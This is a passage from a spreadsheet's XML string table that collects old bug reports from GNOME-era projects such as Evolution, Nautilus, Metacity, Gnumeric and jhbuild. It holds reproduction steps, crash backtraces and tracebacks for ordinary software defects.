    <t>theme-glider</t>
  </si>
  <si>
    <t>the unmaximize button's animation is wrong</t>
  </si>
  <si>
    <t>This bug has been reported here: https://bugzilla.ubuntu.com/2522
When a window is unmaximized the middle button at the top right of the window
on the title bar is an icon of the window maximized.  When the window is
maximized the middle button then becomes an icon of two smaller windows
indicating that the window can be made smaller.  However on mouseover the icon
becomes a maximized icon rather than staying an unmaximized icon -- the tooltip
remains the same. 
I'm using Human but the same thing happens with Glider theme too.
I'm not sure if that's a theme or a metacity issue (it's happening with all the
themes which changes their icon apparently) please reassigning in the right
place if that's a theme issue.</t>
  </si>
  <si>
    <t>EVOLUTION-213646</t>
  </si>
  <si>
    <t>Focus change</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Blocker
Version: 0.16.99 [+cvs.2001.10.24.21.46]
Synopsis: Focus change
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
There are several similar problems. On some sircumstances Evolution
changes the focus of one of its widgets when I do a virtual screen
switch or a focus switch to another program's window.
1) Reading a mail: I am reading a loong mail where I have to scroll up
and down the body. First I choose the mail folder in the tree view on
the left. then i choose the mail from the mail list on the top. Then I
have to click into the mail preview window which is below the mail
list. Finally I can use [Up] and [Down] keys of my keyboard to scroll
up and down.
I already submitted a bug that i would like to have the focus
immediately in the mail body frame after clicking on a mail from the
mail list. For [Up] and [Down] keys to scroll the mail instead of
selecting the next/prev mail in the list. Instead [Ctrl]-[Up] and
[Ctrl]-[Down] should be used to select another mail from the mail list.
Then I start reading the mail. Scroll down slowly. Then I have to switch
to another virtual desktop on Sawfish for some reason. After switching
back to my evolution virtual desktop the focus (i.e. the target where
keys are delevered to) has magically changed to the tree view. This
happens not all the time. Sometimes but then it is annoying enough. I
have to select the folder again and search the position i have stopped
reading the mail.
A similar behaviour happens if e.g. an ICQ windows pops up over
Evolution and i move the mouse into it (i have chosen: Focus:
Enter-only for Sawfish so i only have to move the mouse into the new
window) When I move it back to the evolution window or the icq message
disappears (on Close or Reply) the local focus inside Evolution has
changed too to the tree view.
Hmm now it won't happen again. :-) I am trying and trying but it
doesn't happen again. Strange. :-(
2) When I am writing a new email first entering the destination
address then the subject and finally the body leaving the email window
(which gives the focus to another window) and re-entering the email
composition window brings the entry focus to the subject editline
instead of giving it to the body field where i have been before.
This only happens first time i try this on a new email.
 - click New Message
 - enter destination address
 - press [Tab] twice
 - enter subject
 - press [Tab]
 - enter a little bit of the body
 - leave the email compose window with the mouse
 - enter it again
 - type a character -&gt; it is in the subject line ( :-( )
 - click into the body field
 - type something
 - leave and enter the mail compose window with the mouse
 - local focus stays on the body field (how it should)
</t>
  </si>
  <si>
    <t>DAMNED-LIES-479626</t>
  </si>
  <si>
    <t>translation teams</t>
  </si>
  <si>
    <t>Belarusian Latin identification</t>
  </si>
  <si>
    <t>be@latin.po file should be mapped to official IANA-approved Belarusian Latin language code (in browser): be-Latn. That's the lang code used for representing this belarusian language variant on the web.</t>
  </si>
  <si>
    <t>GNOME-PRINT-98608</t>
  </si>
  <si>
    <t>make install doesn't honor (different) prefix</t>
  </si>
  <si>
    <t>With libgnomeprint 2.1.1 it's not completely possible to do e.g.
configure --prefix=/usr/local
make
make install prefix=/usr/local/stow/libgnomeprint-2.1.1
i.e. build it with one prefix install it to a different prefix.
Some files get installed to /usr/local/lib/libgnomeprint/2.1.1/modules
They should go to
/usr/local/stow/libgnomeprint-2.1.1/lib/libgnomeprint/2.1.1/modules
This feature of autotools is used by users of GNU Stow (as in the example
above).
(It is also used by the debian packaging of gnome print 1.116 and probably
other packaging systems)
The problem was probably introduced with configure.in revision 1.197</t>
  </si>
  <si>
    <t>NAUTILUS-324365</t>
  </si>
  <si>
    <t>nautilus crashes when accessing .. or # location</t>
  </si>
  <si>
    <t>This bug has been opened here: http://bugzilla.ubuntu.com/show_bug.cgi?id=21167
When i go to location bar and insert .. as a location to 
be accessed (and then enter) the nautilus crashes. It 
does not crash if i put anything like: ../_sth_  only 
when it is a bare .. location.
Ubuntu Breeze
Nautilus 2.12.1</t>
  </si>
  <si>
    <t>DAMNED-LIES-466057</t>
  </si>
  <si>
    <t>Wrong bugzilla product for phonemgr</t>
  </si>
  <si>
    <t>On the http://l10n.gnome.org/module/phonemgr page the bugzilla link points to the non-existing phonemgr product indstead of the correct gnome-phone-manager</t>
  </si>
  <si>
    <t>LIBEGG-306169</t>
  </si>
  <si>
    <t>toolbar-editor gcc 4.0 vs libxml2 warning fixes</t>
  </si>
  <si>
    <t>gcc 4.0 makes a lot of noise if you use gchar where guchar was declared. libxml2
deliberately uses unsigned chars. The following patch fixes the warnings.</t>
  </si>
  <si>
    <t>GEDIT-438774</t>
  </si>
  <si>
    <t>Invalid comment characters for CSS</t>
  </si>
  <si>
    <t>Please describe the problem:
gEdit thinks '//' is a valid comment in CSS and it isn't. You are allow to use '/* test here */' but not '// text here' as a comment. The regular expression needs to be fixed.
Steps to reproduce:
1. Open a new document
2. Type in:
* {
font-size: 12px //comment here
}
3. View &gt;&gt; Highlight Mode &gt;&gt; Others &gt;&gt; CSS
Actual results:
The double forward-slash is recognized as a comment.
Expected results:
The double forward-slash should be viewed as invalid or regular text as if gEdit doesn't recognize it.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>brett.jr.alton</t>
  </si>
  <si>
    <t>EVOLUTION-211778</t>
  </si>
  <si>
    <t>Implement on-demand loading of attachments</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.14.99
Synopsis: Evolution should not automatically download attachments
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
One cool feature in beta 2 was that attachment would only be downloaded
if the user wanted to see them. This was *very* handy over ISDN or other
slow network lines.
Now Evo automatically downloads all the attachments... and that is
pretty bad since idiots keep sending me Power Point presentations or
other huge files that I do not necessarily want to view.
This should be left as an option in the user profile. And while we are
at it Evo should tell us before downloading large attachments
(large being a configurable value too). This is a cool feature
available in Mulberry.
</t>
  </si>
  <si>
    <t>NEMIVER-377623</t>
  </si>
  <si>
    <t>Local variables parsing error on multi-parameter template types</t>
  </si>
  <si>
    <t>I'm just adding this here so that I don't forget it.  
I've been playing around with a bit of simple plotting code and have an enum type inside of a template class.  Something like the following:
template 
class Plot
{
   public:
   typedef enum
   {
      LINE
      POINT
      BAR
   } chart_type_t
   ...
   private:
   chart_type_t m_chart_type
   ...
}
When I examine the m_chart_type variable in the local variables widget (using a specialization Plot) it displays it as follows
variable                            | value          | type
m_chart_type                        | Plot&lt;int       |
int&gt;::LINE static m_other_variable |                |
As you can see the value of m_chart_type should be Plot::LINE but when it sees the comma it thinks it marks the end of the variable value so it puts the rest on the next line with the next data member (e.g. int&gt;::LINE static m_...)</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-448431</t>
  </si>
  <si>
    <t>API for GConf in libgames-support</t>
  </si>
  <si>
    <t>gnome-games currently depend upon GConf for saving and loading preferences.
GConf in not available on win32 or the maemo platform.
So I think that we need a API in libgames-support which wraps functions for storing preferences in GConf or a config-file solution depending on the operating system.
Aisleriot already supports using either GConf or a config-file solution depending on which is available. Could the API in Aisleriot be generalized put in libgames-support and used by the other games as well?
See these files:
http://svn.gnome.org/viewcvs/gnome-games/trunk/aisleriot/conf.c?view=markup
http://svn.gnome.org/viewcvs/gnome-games/trunk/libgames-support/games-gconf.c?revision=5561&amp;view=markup
That would ease porting all the games to mingw32/maemo. Of course it would also mean that most of the GConf API would have to be wrapped in libgames-support. I wonder if this has been done already elsewhere? ...</t>
  </si>
  <si>
    <t>GALEON-58443</t>
  </si>
  <si>
    <t>Creation of Bookmark with Icon (remove message)</t>
  </si>
  <si>
    <t>I'd like to request that the message 'Searching of Icon' be removed from
the bookmark creation process.
It's nice that an icon is searched for but telling the user (especially on
a slow loading website) simply gets in the way.
Making this a transparent process shouldn't be a big deal.</t>
  </si>
  <si>
    <t>GTK-DOC-497367</t>
  </si>
  <si>
    <t>don't use US-ASCII for output encoding</t>
  </si>
  <si>
    <t>Please describe the problem:
We can't use non-ASCII encoding (like Japanese) with gtk-doc because gtk-doc.xsl uses US-ASCII for default.encoding and chunker.output.encoding value.
Yes we can get *.html but they has 'content=text/html charset=US-ASCII' and non-ASCII characters are replaced by character entity reference. e.g. ã€Œã‚ã€ -&gt; ã€Œã€
Steps to reproduce:
1. % cd html
2. % gtkdoc-mkhtml sample ../sample-docs.sgml # sample-docs.sgml includes ã€Œã‚ã€
3. % grep '' index.html &gt; /dev/null &amp;&amp; echo found
Actual results:
'found' is echoed.
Expected results:
'found' isn't echoed.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>GNUCASH-762568</t>
  </si>
  <si>
    <t>MacOS</t>
  </si>
  <si>
    <t>GNU cash crashes frequently on MAC OS X el captain 10.11.3</t>
  </si>
  <si>
    <t>After installing GNUcash I can do just a few action (might vary) before the system crashes very soon and very frequently. At reopening GNUcash mentions no exclusive write rights to the file (is thus the cause? and how to set it properly).
I've installed the same version of GNUcash at a windows desktop and was able to work half a day withit without any crashes. 
Can somebody help me on setting GNUcash properly on my Mac. running on OS X el captain 10.11.3.
(I already tried to delete GNUcash and reinstall it by dragging the GNUcash.app to applications. But the problem still occurs).
Thanks!</t>
  </si>
  <si>
    <t>gnucash-mac-maint</t>
  </si>
  <si>
    <t>pamaarts</t>
  </si>
  <si>
    <t>EVOLUTION-202767</t>
  </si>
  <si>
    <t>The File --&gt; New menu has two Mail Message items.</t>
  </si>
  <si>
    <t>The File --&gt; New menu has two Mail Message items.
There should only be one.  If you want to have an alternate
keyboard shortcut and that's why you have to otherwise
identical menu items we should just find a way to attach
the alternate keyboard shortcut to the one menu item.</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-481029</t>
  </si>
  <si>
    <t>deskbar-applet.py missing final newline</t>
  </si>
  <si>
    <t>Please describe the problem:
File deskbar-applet-2.20.0/deskbar/deskbar-applet.py does not have a newline
char on the final line.
This causes sed (at least on Solaris) to truncate the final line resulting
in the installed /usr/lib/deskbar-applet/deskbar-applet file being corrupted.
This appears to have been the case since this file was introduced in 2.19.6.
Steps to reproduce:
1. examine the source code eg
% tail -3 ./deskbar-applet-2.19.6/deskbar/deskbar-applet.py
            deskbar.defs.PACKAGE
            deskbar.defs.VERSION
            applet_factory)% ls -l
2. build on Solaris (using standard /usr/bin/sed)
3. examine installed /usr/lib/deskbar-applet/deskbar-applet file - final line
   is truncated:
% tail -3 /usr/lib/deskbar-applet/deskbar-applet 
            gnomeapplet.Applet.__gtype__
            deskbar.defs.PACKAGE
            deskbar.defs.VERSION
%
Actual results:
On Solaris installed file is corrupted.  Trying to add deskbar applet to panel
fails (gives Bad Python error).
Expected results:
deskbar-applet should build on Solaris using standard sed.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>Dermot.McCluskey</t>
  </si>
  <si>
    <t>BANSHEE-395119</t>
  </si>
  <si>
    <t>Transcoding second time in same session crashes</t>
  </si>
  <si>
    <t>Please describe the problem:
This happened on earlier versions but now I decided to file a bug report.
The problem:
The problem is that transcoding is not working the second time I try in the same session (without restarting banshee)
Steps to reproduce:
1. I open banshee move one .ogg file on iPod.
   Syncronize -&gt; Save Manual changes
Everythong work's great.
2. While banshee opened I move a second .ogg file on iPod
   Syncronize -&gt; Save Manual changes
I get waiting for transcoder but nothing happens and never finish anything.
Actual results:
Banshee does not update the song on iPod
Expected results:
Transcoder should be called and banshee should put the file in mp3 format on iPod
Does this happen every time?
Every time I try. (if the first sync does not call transcoding (ex: moving an mp3 first) then the second sync works but the third does not)
Other information:
i'm using gstreamer in ubuntu dapper</t>
  </si>
  <si>
    <t>mihai.ile</t>
  </si>
  <si>
    <t>GNUMERIC-83877</t>
  </si>
  <si>
    <t>space separation of data crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.61
Synopsis: space separation of data crash
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
i tried to import a data set and as soon as i tried to use separated by
spaces the thing crashed :(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x407a5519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x407a5519 in __wait4 () from /lib/i686/libc.so.6
#1  0x408159e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x402777e8 in gnome_segv_handle () at eval.c:41
#3  
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
#5  0x0811093d in stf_preview_render () at eval.c:41
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
#8  0x403c42b1 in gtk_marshal_NONE__NONE () at eval.c:41
#9  0x403f7916 in gtk_handlers_run () at eval.c:41
#10 0x403f6c3d in gtk_signal_real_emit () at eval.c:41
#11 0x403f49f5 in gtk_signal_emit () at eval.c:41
#12 0x403943e8 in gtk_editable_insert_text () at eval.c:41
#13 0x40395edf in gtk_entry_set_text () at eval.c:41
#14 0x0810f998 in stf_dialog_format_page_prepare () at eval.c:41
#15 0x403c4188 in gtk_marshal_NONE__POINTER () at eval.c:41
#16 0x403f7916 in gtk_handlers_run () at eval.c:41
#17 0x403f6c3d in gtk_signal_real_emit () at eval.c:41
#18 0x403f49f5 in gtk_signal_emit () at eval.c:41
#19 0x4025eb48 in gnome_druid_page_prepare () at eval.c:41
#20 0x4025dd04 in gnome_druid_set_page () at eval.c:41
#21 0x0810c554 in stf_dialog_set_scroll_region_and_prevent_center ()
    at eval.c:41
#22 0x403c3fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#23 0x403f7916 in gtk_handlers_run () at eval.c:41
#24 0x403f6c3d in gtk_signal_real_emit () at eval.c:41
#25 0x403f49f5 in gtk_signal_emit () at eval.c:41
#26 0x4025ea58 in gnome_druid_page_next () at eval.c:41
#27 0x4025d0f4 in gnome_druid_next_callback () at eval.c:41
#28 0x403c42b1 in gtk_marshal_NONE__NONE () at eval.c:41
#29 0x403f7916 in gtk_handlers_run () at eval.c:41
#30 0x403f6c3d in gtk_signal_real_emit () at eval.c:41
#31 0x403f49f5 in gtk_signal_emit () at eval.c:41
#32 0x4035bf2d in gtk_button_clicked () at eval.c:41
#33 0x4035d6ed in gtk_real_button_released () at eval.c:41
#34 0x403c42b1 in gtk_marshal_NONE__NONE () at eval.c:41
#35 0x403f6ac1 in gtk_signal_real_emit () at eval.c:41
#36 0x403f49f5 in gtk_signal_emit () at eval.c:41
#37 0x4035be5d in gtk_button_released () at eval.c:41
#38 0x4035cfd7 in gtk_button_button_release () at eval.c:41
#39 0x403c3fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#40 0x403f6c7d in gtk_signal_real_emit () at eval.c:41
#41 0x403f49f5 in gtk_signal_emit () at eval.c:41
#42 0x4042f0e9 in gtk_widget_event () at eval.c:41
#43 0x403c3f15 in gtk_propagate_event () at eval.c:41
#44 0x403c2f3f in gtk_main_do_event () at eval.c:41
#45 0x4047ae4f in gdk_event_dispatch () at eval.c:41
#46 0x4060d7f3 in g_main_dispatch () at eval.c:41
#47 0x4060ddd9 in g_main_iterate () at eval.c:41
#48 0x4060df8c in g_main_run () at eval.c:41
#49 0x403c2803 in gtk_main () at eval.c:41
#50 0x0810cdd8 in stf_dialog () at eval.c:41
#51 0x0808c6a5 in gnumeric_create_popup_menu () at eval.c:41
#52 0x0808c934 in gnumeric_create_popup_menu () at eval.c:41
#53 0x403c42dc in gtk_marshal_NONE__POINTER_INT () at eval.c:41
#54 0x403f7916 in gtk_handlers_run () at eval.c:41
#55 0x403f6c3d in gtk_signal_real_emit () at eval.c:41
#56 0x403f4dd9 in gtk_signal_emit_by_name () at eval.c:41
#57 0x403f3afa in gtk_selection_retrieval_report () at eval.c:41
#58 0x403f3780 in gtk_selection_notify () at eval.c:41
#59 0x403c3fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#60 0x403f6c7d in gtk_signal_real_emit () at eval.c:41
#61 0x403f49f5 in gtk_signal_emit () at eval.c:41
#62 0x4042f0e9 in gtk_widget_event () at eval.c:41
#63 0x403c2fe4 in gtk_main_do_event () at eval.c:41
#64 0x4047ae4f in gdk_event_dispatch () at eval.c:41
#65 0x4060d7f3 in g_main_dispatch () at eval.c:41
#66 0x4060ddd9 in g_main_iterate () at eval.c:41
#67 0x4060df8c in g_main_run () at eval.c:41
#68 0x403c2803 in gtk_main () at eval.c:41
#69 0x080663d2 in _start () at eval.c:41
#70 0x08066435 in main () at eval.c:41
#71 0x40707177 in __libc_start_main (main=0x8066420  argc=1 
    ubp_av=0xbffff91c init=0x8062f5c  fini=0x812fc0c  
    rtld_fini=0x4000e184  stack_end=0xbffff90c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x407a5519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x408159e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x402777e8 in gnome_segv_handle () at eval.c:41
	in eval.c
ap = (void **) 0x82e85f8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 137266680
result = 0
#3  
No locals.
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x82e85f8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 137266680
result = 0
#5  0x0811093d in stf_preview_render () at eval.c:41
41	in eval.c
ap = (void **) 0x8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8327110 \200C2\b\001
result = 8
result = 137523472
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8327110 \200C2\b\001
result = 8
result = 137523472
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x8323d08
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x833ad88 46.9
result = 137510152
result = 137604488
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-06-02 07:57 -------
The original reporter (saraf@student.unsw.edu.au) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>saraf</t>
  </si>
  <si>
    <t>CONDUIT-525259</t>
  </si>
  <si>
    <t>the canvas pane become a mess for remote startup</t>
  </si>
  <si>
    <t>I started up conduit remotely and did an operation on the canvas pane such as dragging a data provider to the right canvas pane or delete an item for a group the right canvas pane became a mess.</t>
  </si>
  <si>
    <t>jijun.yu</t>
  </si>
  <si>
    <t>BEAST-346916</t>
  </si>
  <si>
    <t>beast-gtk</t>
  </si>
  <si>
    <t>Tact numbers in TrackRoll view wrong</t>
  </si>
  <si>
    <t>The tact numbers in track roll view should be simply counted like 1 2 3 4 5 and so on (there are no :2 tacts). I'll attach a patch which fixes this.</t>
  </si>
  <si>
    <t>JHBUILD-148959</t>
  </si>
  <si>
    <t>Tinderbox fails if module contains '/' character</t>
  </si>
  <si>
    <t>The tinderbox command assumes it can create a text file named like the module.
This fails if the module has a '/' in its name like gnome-python/pygtk:
$ jhbuild tinderbox -o web
Traceback (most recent call last):
  File /home/gnomecvs/bin/jhbuild line 6 in ?
    jhbuild.main.main(sys.argv[1:])
  File /cvs/gnome2/jhbuild/jhbuild/main.py line 115 in main
    jhbuild.commands.run(command config args)
  File /cvs/gnome2/jhbuild/jhbuild/commands/base.py line 44 in run
    return func(config args)
  File /cvs/gnome2/jhbuild/jhbuild/commands/tinderbox.py line 64 in do_tinderbox
    build.build()
  File /cvs/gnome2/jhbuild/jhbuild/frontends/buildscript.py line 64 in build
    self.start_module(module.name)
  File /cvs/gnome2/jhbuild/jhbuild/frontends/tinderbox.py line 181 in
start_module
    '%s.txt' % module) 'w')
IOError: [Errno 2] No such file or directory:
'/home/gnomecvs/tmp/web/gnome-python/pygtk.txt'
Patch which replaces the '/' with '_' to create the filename follows.</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-333783</t>
  </si>
  <si>
    <t>Glossentries for new MIME system</t>
  </si>
  <si>
    <t>Documentation 
Section: Glossary
* file content sniffer
* MIME information file
* MIME keys file
* MIME type registry
* pattern mask
Correct version:
Nothing just remove them. All those entries belong to old MIME system no
longer documented here
Other information:
* I can remove them from CVS if you are right
* Maybe someone should add some new glossentries for new (fd.o) MIME system</t>
  </si>
  <si>
    <t>EVOLUTION-247699</t>
  </si>
  <si>
    <t>i18n is broken in 'Click to add task' dialog</t>
  </si>
  <si>
    <t>Description of Problem:
I cannot type accented characters with dead key
sequence on Tasks page
Steps to reproduce the problem:
1. Open Tasks
2. click into 'Click to add task' or click into
existing task summary text (ie. to rename task)
3. type '+' 'r' or something like that with
national (czech) keyboard enabled
Result:
Normal unaccented character appears (dead key is
ignored)
Expected result:
Accented character.
How often does this happen? 
Every time.
Additional Information:
Other dialog boxes works ok.  F.E. if I open task
I can type accented characters into Summary field
It maybe gtk bug but I don't know how to test it.</t>
  </si>
  <si>
    <t>ATK-497218</t>
  </si>
  <si>
    <t>No object:active-descendant-changed generated when arrowing into table in gtk-demo Tree View -&gt; List Store demo.</t>
  </si>
  <si>
    <t>See also Orca bug #486895 which is affected by this problem.
In particular the evaluation in comment #2:
http://bugzilla.gnome.org/show_bug.cgi?id=486895#c2
----
Steps to reproduce:
0. Run Orca.
1. Run gtk-demo Tree View -&gt; List Store demo.  The demo comes up
   with the Bug Number column header with focus.
2. Arrow right twice to the Description column header.
3. Arrow down once.
In Orca at this point we get an object:state-changed:focused event
for the table.
OBJECT EVENT: object:state-changed:focused             detail=(10)
    app.name='gtk-demo' name='None' role='table' state='enabled focusable focused sensitive showing visible manages descendants' relations=''
The problem is that we have not had (not do we subsequently get) an
object:active-descendant-changed event for the child in the table 
which has just been selected.
We are unable to derive this information (which table cell is currently
selected) from the information provided by just the
object:state-changed:focused event.</t>
  </si>
  <si>
    <t>EVOLUTION-228982</t>
  </si>
  <si>
    <t>monthly appointment recurrence</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: P2
Version: 1.0.8
Synopsis: monthly appointment recurrence
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
I have two appointments that recur on the last Thursday and the last Friday of every month.
I am given the option of the 4th and 5th weekday of each month.  This is not the same thing.  Thus this bug report.
I tried selecting the 5th weekday of each month but that only listed an appointment in the months that had a 5th weekday.  And I suppose would have been a bug in itself.
Unknown priority P2. Setting to default priority Normal.
Unknown reporter: gadgeteer@elegantinnovations.org changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>gadgeteer</t>
  </si>
  <si>
    <t>LDTP-351227</t>
  </si>
  <si>
    <t>verifypartialmatch crashes for empty text</t>
  </si>
  <si>
    <t>Steps to Reproduce crash:
#1. Open Gedit and type in some text
#2. Open Python prompt and do `from ldtp import *'
#3. In python prompt type in `verifypartialmatch ('*gedit''txt0''')' this will cause the ldtp server to crash with segmentation fault</t>
  </si>
  <si>
    <t>CONDUIT-516410</t>
  </si>
  <si>
    <t>Error in GoogleModule loading</t>
  </si>
  <si>
    <t>Conduit version 0.3.7
Sorry for my poor bug report :-(
I have this fragment in my debug: 
[Utils               ][DEBUG  ] Adding /usr/local/lib/conduit/modules/GoogleModule to python path (Utils.py:117)
[Module              ][WARNING] Error loading the file: /usr/local/lib/conduit/modules/GoogleModule/GoogleModule.py.
Traceback (most recent call last):
  File /usr/local/lib/python2.5/site-packages/conduit/Module.py line 198 in _load_modules_in_file
    mod = self._import_file(filename)
  File /usr/local/lib/python2.5/site-packages/conduit/Module.py line 179 in _import_file
    mods = pydoc.importfile (filename)
  File pydoc.py line 259 in importfile
    raise ErrorDuringImport(path sys.exc_info())
ErrorDuringImport: problem in /usr/local/lib/conduit/modules/GoogleModule/GoogleModule.py - : No module named media
 (Module.py:231)
If i run conduit from directory where i compiled it runs well.
After make clean &amp;&amp; make &amp;&amp; sudo make install i run 
conduit
and it doesn't work with the error reported</t>
  </si>
  <si>
    <t>e.colutta</t>
  </si>
  <si>
    <t>GTK+-153917</t>
  </si>
  <si>
    <t>gtk file chooser steals global focus</t>
  </si>
  <si>
    <t>use ctrl-l and type something that starts to complete.
the popup grabs focus anyway even if it isn't the focussed window and then when
you do above it keeps focus even if you change desktops/etc until you mouse
click or something.
this doesn't properly honour focus-follows-mouse window manager settings.</t>
  </si>
  <si>
    <t>METACITY-104023</t>
  </si>
  <si>
    <t>using CurrentTime for _NET_WM_PING in response to _NET_CLOSE</t>
  </si>
  <si>
    <t>The two snippets below amount to a problem. When we get a _NET_CLOSE we
attempt to send a _NET_WM_PING to the window with timestamp == CurrentTime
but meta_display_ping_window doesn't allow this because CurrentTime is no
good for uniquely identifying pongs.
I'll attach a test app to play around with the various behaviours that
metacity handles when closing a window.
======
      /* I think the wm spec should maybe put a time
       * in this message CurrentTime here is sort of
       * bogus. But it rarely matters most likely.
       */
      meta_window_delete (window meta_display_get_current_time
(window-&gt;display))
=====
  if (timestamp == CurrentTime)
    {
      meta_warning (Tried to ping a window with CurrentTime! Not allowed.\n)
      return
    }
=====</t>
  </si>
  <si>
    <t>MEDUSA-41510</t>
  </si>
  <si>
    <t>Tokenizer</t>
  </si>
  <si>
    <t>Ability to delete items from on disk hashes</t>
  </si>
  <si>
    <t xml:space="preserve">This is tricky -- there will have to be some good way to reuse the space that
has been deleted but it would be nice to have when updating indexes since 
installing something big will cause the hashes to keep around large amounts of
useless crap.  But it is certainly unessential.  I am marking this bug
deferred.
------- Additional Comments From rebecka@eazel.com 2000-06-28 19:59:20 ----
This is actually after 1.0.  it was never included in 1.0 so it isn't deferred.
------- Additional Comments From eli@eazel.com 2000-10-16 12:32:35 ----
Batch assigning Josh as the Quality Engineering contaact for Medusa bugs.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
</t>
  </si>
  <si>
    <t>NAUTILUS-46505</t>
  </si>
  <si>
    <t>[obsolete] Sound</t>
  </si>
  <si>
    <t>Nautilus Music Preview (NMP) will sometimes play its targeted file indefinitely</t>
  </si>
  <si>
    <t xml:space="preserve">NMP will sometimes play it's targeted file indefinitely while while Nautilus is
busy scanning files in the current folder or changing the view mode from View
as Icons to View as List.  The latter might be due to the same reason as the
first Changing the view mode from View as Icons to View as Music works as
expected.
The window of opportunity for this bug is very specific and is sensitive to
system load ( CPU &amp; DISK ). **I'll this in the steps need reproduce this bug
* REPRODUCIBLE: Sometimes
* STEPS TO REPRODUCE:
** The following steps are not neccessary but they help to make things easier.
1. Open two terminals.
2. In one run top ( terminal1 ).
** I use top to monitor for runaway instances of mpg123 or sox.
3. I use the second terminal ( terminal2 ) to kill mpg123 or sox when
nautilus fails to so.
** neccessary steps
Case One:
1. Start Nautilus.
2. Go to a folder ( folder1 ) which contains some music files and at
least one subfolder ( folder2 ).
** The more items in folder1 the better.  This very important
the more items nautilus has to scan the high the probability
one has in reproducing this bug.
3. Locate a music file ( music1 ).
4. Now this the tricky part.  Double click on folder1 then quickly
move the mouse pointer over music1.
** The quickly part has to be done very fast!!!.  One must have
placed the mouse pointer over music1 before Nautilus changes
the currently displayed folder ( folder1 ) to folder2 and
NMP must have enough time to initiate a preview.  Check for
instances of mpg123 or sox using top running in terminal1
again NMP sometimes takes several seconds before it actually
start to play music1 but by using top one could instantly
see if mpg123/sox started and the go on to linger.
*** Tbis is the window of opportunity for this bug that I
referred to in the Description for this bug.
Case Two:
1. kill any runaway mpg123 or sox instances if one has not already
done so.
2. Go back to folder1.
3. Locate music1.
4. Switch nautilus view mode to View as List then quickly move the
mouse pointer over music1.
** Read the comments for Case One step 4 if one has to.  I think
the bug is happening here for the same reason.
Case Three:
1. Repeat the steps neccessary to reproduce this bug for Case Two
but replace step 4 with the following step.
2. Click on the refresh button then quickly place the mouse pointer
over music1.
Case Four:
1. Repeat the steps neccessary to reproduce this bug for Case Two
but replace step 4 with the following step.
2. It is neccessary to remember the exact position of the icon for
music1.
3. Double click on folder2.
4. Click on the back botton then quickly move the pointer over to
the remembered position for the icon of music1.
** This sort of the reserve of Case one.
Case Five:
1. Repeat the steps neccessary to reproduce this bug for Case Two
but replace step 4 with the following step.
2. It is neccessary to remember the exact position of the icon for
music1.
3. Switch nautilus's view mode to View as List.
4. Switch nautilus's view mode back to View as Icons then quickly
move the mouse pointer over the remembered position of music1 icon.
** This sort of the reserve of Case Two.
* ACTUAL RESULTS:
 NMP ( Nautilus Music Preview ) will sometimes fail to stop playing music1 for
all cases.
* EXPECTED RESULTS:
  NMP should stop playing music1 when it is expected to do so.
This bug is very sensitive to system load( CPU &amp; DISK).  Hence on a very fast
machine with a lot memory the window of opportunity will be smaller if not
nonexistent if said machine is fast enough and also have no other running
processes in background( Mozilla is very good for hogging memory especially with
java installed and medusa-indexd is good at hogging I/O ) .  Also make sure
that the folder ( folder1 ) and subfolder ( folder2 ) have a lot of items.
I also found that running nautilus with gdb made the reproducibility of this
bug almost always
------- Additional Comments From sullivan@eazel.com 2001-02-12 09:12:01 ----
Leaving for Don to assign priority.
------- Additional Comments From don@eazel.com 2001-02-12 14:57:39 ----
Thanks for the very thorough bug report!
This is annoying but according to Gene it's exceptionally hard to reproduce. 
I'm moving this to post 1.0.1 for investigation.  I don't think it's a 1.0
blocker.
